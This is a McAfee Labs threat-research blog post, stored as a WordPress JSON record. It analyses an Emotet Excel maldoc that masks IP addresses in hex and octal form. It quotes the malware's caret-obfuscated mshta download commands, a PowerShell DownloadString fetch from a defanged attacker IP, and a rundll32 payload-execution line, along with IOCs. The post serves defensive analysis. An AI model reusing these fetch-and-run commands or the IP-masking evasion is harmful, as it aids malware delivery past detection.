{"id":136663,"date":"2022-02-04T15:00:33","date_gmt":"2022-02-04T23:00:33","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=136663"},"modified":"2024-02-17T08:24:34","modified_gmt":"2024-02-17T16:24:34","slug":"emotets-uncommon-approach-of-masking-ip-addresses","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/","title":{"rendered":"Emotet\u2019s Uncommon Approach of Masking IP Addresses"},"content":{"rendered":"<p>Authored By: Kiran Raj<\/p>\n<p>In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:<\/p>\n<p>Hexadecimal format: 0xb907d607<\/p>\n<p>Octal format: 0056.0151.0121.0114<\/p>\n<p>Decimal format: 185.7.214.7<\/p>\n<p>This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.<\/p>\n<figure id=\"attachment_136666\" aria-describedby=\"caption-attachment-136666\" style=\"width: 624px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-136666\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/heatmap-1.png\" alt=\"Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee\" width=\"624\" height=\"371\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/heatmap-1.png 624w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/heatmap-1-300x178.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/heatmap-1-205x122.png 205w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><figcaption id=\"caption-attachment-136666\" class=\"wp-caption-text\">Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee<\/figcaption><\/figure>\n<h2>Threat Summary<\/h2>\n<ol>\n<li data-leveltext=\"%1.\" data-font=\"\" data-listid=\"3\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">The initial attack vector is a phishing email with a Microsoft Excel attachment.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"%1.\" data-font=\"\" data-listid=\"3\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"%1.\" data-font=\"\" data-listid=\"3\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">The malicious JavaScript further invokes PowerShell to download the Emotet payload.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"%1.\" data-font=\"\" data-listid=\"3\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries&#8217; command-and-control server.<\/span><\/li>\n<\/ol>\n<h2>Maldoc Analysis<\/h2>\n<p>Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.<\/p>\n<p><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-136687\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-2-initial-worksheet-and-hidden-macrosheets.png\" alt=\"\" width=\"624\" height=\"283\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-2-initial-worksheet-and-hidden-macrosheets.png 624w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-2-initial-worksheet-and-hidden-macrosheets-300x136.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-2-initial-worksheet-and-hidden-macrosheets-205x93.png 205w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><\/span><\/p>\n<p>On examining the excel spreadsheet further, we can see a few cell addresses added in the <em>Named Manager<\/em> window. Cells mentioned in the <em>Auto_Open<\/em> value will be executed automatically resulting in malicious code execution.<\/p>\n<figure id=\"attachment_136708\" aria-describedby=\"caption-attachment-136708\" style=\"width: 624px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-136708\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-3-Named-Manager-and-Auto_Open-triggers.png\" alt=\"Figure 3- Named Manager and Auto_Open triggers\" width=\"624\" height=\"270\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-3-Named-Manager-and-Auto_Open-triggers.png 624w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-3-Named-Manager-and-Auto_Open-triggers-300x130.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-3-Named-Manager-and-Auto_Open-triggers-205x89.png 205w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><figcaption id=\"caption-attachment-136708\" class=\"wp-caption-text\">Figure 3- Named Manager and Auto_Open triggers<\/figcaption><\/figure>\n<p>Below are the commands used in Hexadecimal and Octal variants of the Maldocs<\/p>\n<table width=\"756\">\n<tbody>\n<tr>\n<td width=\"120\"><strong>FORMAT<\/strong><\/td>\n<td width=\"390\"><strong>OBFUSCATED CMD<\/strong><\/td>\n<td width=\"246\"><strong>DEOBFUSCATED CMD<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"120\">Hexadecimal<\/td>\n<td width=\"390\">cmd \/c m^sh^t^a h^tt^p^:\/^\/[0x]b907d607\/fer\/fer.html<\/td>\n<td width=\"246\">http:\/\/185[.]7[.]214[.]7\/fer\/fer.html<\/td>\n<\/tr>\n<tr>\n<td width=\"120\">Octal<\/td>\n<td width=\"390\">cmd \/c m^sh^t^a h^tt^p^:\/^\/0056[.]0151[.]0121[.]0114\/c.html<\/td>\n<td width=\"246\">http:\/\/46[.]105[.]81[.]76\/c.html<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Execution<\/h2>\n<p>On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.<\/p>\n<figure id=\"attachment_136729\" aria-describedby=\"caption-attachment-136729\" style=\"width: 624px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-136729\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-4-Process-tree-of-excel-execution.png\" alt=\"Figure 4: Process tree of excel execution\" width=\"624\" height=\"131\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-4-Process-tree-of-excel-execution.png 624w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-4-Process-tree-of-excel-execution-300x63.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-4-Process-tree-of-excel-execution-205x43.png 205w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><figcaption id=\"caption-attachment-136729\" class=\"wp-caption-text\">Figure 4: Process tree of excel execution<\/figcaption><\/figure>\n<p>The downloaded file <em>fer.html<\/em> containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code<\/p>\n<figure id=\"attachment_136750\" aria-describedby=\"caption-attachment-136750\" style=\"width: 612px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-136750\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-5-Image-of-HTML-page-viewed-on-browser.png\" alt=\"Figure 5- Image of HTML page viewed on browser\" width=\"612\" height=\"85\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-5-Image-of-HTML-page-viewed-on-browser.png 612w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-5-Image-of-HTML-page-viewed-on-browser-300x42.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-5-Image-of-HTML-page-viewed-on-browser-205x28.png 205w\" sizes=\"auto, (max-width: 612px) 100vw, 612px\" \/><figcaption id=\"caption-attachment-136750\" class=\"wp-caption-text\">Figure 5- Image of HTML page viewed on a browser<\/figcaption><\/figure>\n<p>The Malicious JavaScript invokes PowerShell to download the Emotet payload from \u201c<em>hxxp:\/\/185[.]7[.]214[.]7\/fer\/fer.png<\/em>\u201d to the following path \u201c<em>C:\\Users\\Public\\Documents\\ssd.dll\u201d<\/em>.<\/p>\n<table width=\"636\">\n<tbody>\n<tr>\n<td width=\"66\"><em>cmd line<\/em><\/td>\n<td width=\"570\">(New-Object Net.WebClient).DownloadString(\u2018http:\/\/185[.]7[.]214[.]7\/fer\/fer.png\u2019)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server<\/p>\n<table width=\"636\">\n<tbody>\n<tr>\n<td width=\"72\"><em>cmd line<\/em><\/td>\n<td width=\"564\">cmd \u00a0\/c C:\\Windows\\SysWow64\\rundll32.exe C:\\Users\\Public\\Documents\\ssd.dll,AnyString<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>IOC<\/h2>\n<table width=\"786\">\n<tbody>\n<tr>\n<td width=\"42\"><strong>TYPE<\/strong><\/td>\n<td width=\"496\"><strong>VALUE<\/strong><\/td>\n<td width=\"87\"><strong>SCANNER<\/strong><\/td>\n<td width=\"161\"><strong>DETECTION NAME<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"42\">XLS<\/td>\n<td width=\"496\">06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c<\/td>\n<td width=\"87\">McAfee LiveSafe and Total Protection<\/td>\n<td width=\"161\">X97M\/Downloader.nn<\/td>\n<\/tr>\n<tr>\n<td width=\"42\">DLL<\/td>\n<td width=\"496\">a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3<\/td>\n<td width=\"87\">McAfee LiveSafe and Total Protection<\/p>\n<p>&nbsp;<\/td>\n<td width=\"161\">Emotet-FSY<\/td>\n<\/tr>\n<tr>\n<td width=\"42\">HTML URL<\/td>\n<td width=\"496\">http:\/\/185[.]7[.]214[.]7\/fer\/fer.html<\/p>\n<p>http:\/\/46[.]105[.]81[.]76\/c.html<\/td>\n<td width=\"87\">WebAdvisor<\/td>\n<td width=\"161\">Blocked<\/td>\n<\/tr>\n<tr>\n<td width=\"42\">DLL URL<\/td>\n<td width=\"496\">http:\/\/185[.]7[.]214[.]7\/fer\/fer.png<\/p>\n<p>http:\/\/46[.]105[.]81[.]76\/cc.png<\/td>\n<td width=\"87\">WebAdvisor<\/td>\n<td width=\"161\">Blocked<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK<\/h2>\n<table width=\"786\">\n<tbody>\n<tr>\n<td width=\"120\"><strong>TECHNIQUE ID<\/strong><\/td>\n<td width=\"216\"><strong>TACTIC<\/strong><\/td>\n<td width=\"210\"><strong>TECHNIQUE DETAILS<\/strong><\/td>\n<td width=\"240\"><strong>DESCRIPTION<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"120\">T1566<\/td>\n<td width=\"216\">Initial access<\/td>\n<td width=\"210\">Phishing attachment<\/td>\n<td width=\"240\">Initial maldoc uses phishing strings to convince users to open the maldoc<\/td>\n<\/tr>\n<tr>\n<td width=\"120\">T1204<\/td>\n<td width=\"216\">Execution<\/td>\n<td width=\"210\">User Execution<\/td>\n<td width=\"240\">Manual execution by user<\/td>\n<\/tr>\n<tr>\n<td width=\"120\">T1071<\/td>\n<td width=\"216\">Command and Control<\/td>\n<td width=\"210\">Standard Application Layer Protocol<\/td>\n<td width=\"240\">Attempts to connect through HTTP<\/td>\n<\/tr>\n<tr>\n<td width=\"120\">T1059<\/td>\n<td width=\"216\">Command and Scripting Interpreter<\/td>\n<td width=\"210\">Starts CMD.EXE for commands execution<\/td>\n<td width=\"240\">Excel uses cmd and PowerShell to execute command<\/td>\n<\/tr>\n<tr>\n<td width=\"120\">T1218<\/p>\n<p>&nbsp;<\/td>\n<td width=\"216\">Signed Binary Proxy Execution<\/td>\n<td width=\"210\">Uses RUNDLL32.EXE and MSHTA.EXE to load library<\/td>\n<td width=\"240\">rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Conclusion<\/h2>\n<p>Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc&#8230;<\/p>\n","protected":false},"author":695,"featured_media":136771,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[12220],"coauthors":[4136],"class_list":["post-136663","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs","tag-emotet-maldoc"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Emotet\u2019s Uncommon Approach of Masking IP Addresses | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Emotet\u2019s Uncommon Approach of Masking IP Addresses | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2022-02-04T23:00:33+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-02-17T16:24:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"Emotet\u2019s Uncommon Approach of Masking IP Addresses\",\"datePublished\":\"2022-02-04T23:00:33+00:00\",\"dateModified\":\"2024-02-17T16:24:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/\"},\"wordCount\":690,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg\",\"keywords\":[\"Emotet maldoc\"],\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/\",\"name\":\"Emotet\u2019s Uncommon Approach of Masking IP Addresses | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg\",\"datePublished\":\"2022-02-04T23:00:33+00:00\",\"dateModified\":\"2024-02-17T16:24:34+00:00\",\"description\":\"Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Emotet\u2019s Uncommon Approach of Masking IP Addresses\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Emotet\u2019s Uncommon Approach of Masking IP Addresses | McAfee Blog","description":"Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Emotet\u2019s Uncommon Approach of Masking IP Addresses | McAfee Blog","og_description":"Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2022-02-04T23:00:33+00:00","article_modified_time":"2024-02-17T16:24:34+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg","type":"image\/jpeg"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"Emotet\u2019s Uncommon Approach of Masking IP Addresses","datePublished":"2022-02-04T23:00:33+00:00","dateModified":"2024-02-17T16:24:34+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/"},"wordCount":690,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg","keywords":["Emotet maldoc"],"articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/","name":"Emotet\u2019s Uncommon Approach of Masking IP Addresses | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg","datePublished":"2022-02-04T23:00:33+00:00","dateModified":"2024-02-17T16:24:34+00:00","description":"Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Emotet\u2019s Uncommon Approach of Masking IP Addresses"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security 